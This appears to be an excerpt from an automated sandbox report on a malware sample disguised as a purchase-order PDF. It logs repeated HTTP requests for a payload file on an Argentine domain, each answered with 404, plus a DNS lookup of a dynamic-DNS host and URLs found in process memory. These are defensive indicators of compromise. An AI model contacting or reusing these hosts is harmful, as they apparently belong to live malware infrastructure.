                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficHTTP traffic detected: GET /rindasq/Mktxz.vdf HTTP/1.1Host: sierrassinfinusadas.com.ar
                    Source: global trafficDNS traffic detected: DNS query: sierrassinfinusadas.com.ar
                    Source: global trafficDNS traffic detected: DNS query: teewire.ydns.eu
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:18 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:21 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:27 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:29 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:32 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:36 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:38 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:48 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:50 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:57 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:55:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:10 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:12 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:18 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:21 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:27 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:32 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:37 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:39 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:47 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:50 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:56 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:56:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:09 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:12 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:18 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:22 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:24 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:26 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:32 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:44 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:46 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:56 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:57:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:05 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:10 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:12 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:14 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:19 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:21 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:23 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:27 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:30 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:32 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:34 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:37 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:40 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:42 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:48 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:57 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:58:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:59:02 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:59:06 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:59:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:59:10 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 21 Nov 2024 11:59:13 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4592317023.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Directory.exe, 00000005.00000002.4589476945.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.000000000304D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029F7000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002FDB000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F80000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000003007000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D6B000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sierrassinfinusadas.com.ar
                    Source: Directory.exe, 00000005.00000002.4589476945.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002BE5000.00000004.00000800.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4589476945.0000000002B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sierrassinfinusadas.com.ar(B
